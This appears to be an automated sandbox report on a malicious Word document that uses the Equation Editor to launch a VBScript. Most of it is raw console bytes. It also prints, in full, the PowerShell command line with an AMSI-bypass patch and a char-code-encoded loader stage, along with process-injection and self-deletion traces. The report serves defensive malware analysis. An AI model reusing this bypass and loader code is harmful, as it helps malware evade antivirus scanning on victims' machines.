Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....}C.............................}..v....h~C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+..................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+...............i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....7..................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....7...............i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....C..................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....C...............i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O..................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O...............i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[..................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[...............i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g..................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g...............i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s..................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s...............i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0%D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....%D.............................}..v....h&D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0-D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....-D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....05D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....5D.............................}..v....h6D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0=D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....=D.............................}..v....h>D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0ED.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....ED.............................}..v....hFD.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0MD.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....MD.............................}..v....hND.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'..................k.....m..............................}..v....0UD.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............i..k.....UD.............................}..v....hVD.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3..................k.....m..............................}..v....0]D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............i..k.....]D.............................}..v....h^D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?..................k.....m..............................}..v....0eD.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?...............i..k.....eD.............................}..v....hfD.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K..................k.....m..............................}..v....0mD.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K...............i..k.....mD.............................}..v....hnD.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W..................k.....m..............................}..v....0uD.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W...............i..k.....uD.............................}..v....hvD.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c..................k.....m..............................}..v....0}D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c...............i..k.....}D.............................}..v....h~D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o..................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o...............i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{..................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{...............i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v......D.....0.......................r.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k....p.D.............................}..v......D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#..................k.....m..............................}..v......D.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............i..k....@.D.............................}..v......D.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../..................k.....m..............................}..v......E.....0.......................r.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............i..k......E.............................}..v....H.E.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;....... ..........k.....m..............................}..v......E.....0................i..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............i..k......E.............................}..v......E.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O..................k.... ...............................}..v....pIW.....0.......................j.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O...............Y..k....(JW.............................}..v.....JW.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.5.7.............}..v.....NW.....0.......................$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[...............Y..k....pOW.............................}..v.....OW.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g..................k.... ...............................}..v.....VW.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g...............Y..k....pWW.............................}..v.....WW.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s..................k.... ...............................}..v.....^W.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s...............Y..k....p_W.............................}..v....._W.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v.....fW.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....pgW.............................}..v.....gW.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v.....nW.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....poW.............................}..v.....oW.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v.....vW.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....pwW.............................}..v.....wW.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v.....~W.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....P.W.....0.......................\|.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....................................}..v......W.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....P.W.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k......W.............................}..v......W.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .x.c.e.p.t.i.o.n...........................}..v.... .W.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k......W.............................}..v....X.W.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'..................k.... ...............................}..v......W.....0.......................`.......................

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like 'iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like 'Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$91534784575270519153478457527051915347845752705191534784575270519153478457527051=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\calc.exe {path}
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\calc.exe {path}
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"

Source: C:\Windows\SysWOW64\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\SysWOW64\cscript.exe

WMI Queries: IWbemServices::ExecMethod - Win32_Process::CrEaTe

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDDA1.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 13_2_00B8719A CoCreateInstance,GetStdHandle,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: RFQ-CIF DT22.doc

Static file information: File size 2186640 > 1048576

Source:	Binary string: wntdll.pdb source: calc.exe, calc.exe, 0000000B.00000003.488729930.00000000007C0000.00000004.00000001.sdmp, calc.exe, 0000000B.00000002.542590602.0000000000CB0000.00000040.00000001.sdmp, calc.exe, 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, calc.exe, 0000000B.00000003.487607468.0000000000660000.00000004.00000001.sdmp, cscript.exe
Source:	Binary string: cscript.pdbN source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp
Source:	Binary string: cscript.pdb source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp, cscript.exe

Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041E99D push fs; ret
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00416BC6 push esp; iretd
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041EB8A push dword ptr [AD487281h]; ret
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041D4B5 push eax; ret
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041D56C push eax; ret
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041D502 push eax; ret
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041D50B push eax; ret
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041BE96 push ss; retf
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00417740 push FFFFFFDAh; ret
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041EFC8 push esp; ret
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B4DFA1 push ecx; ret
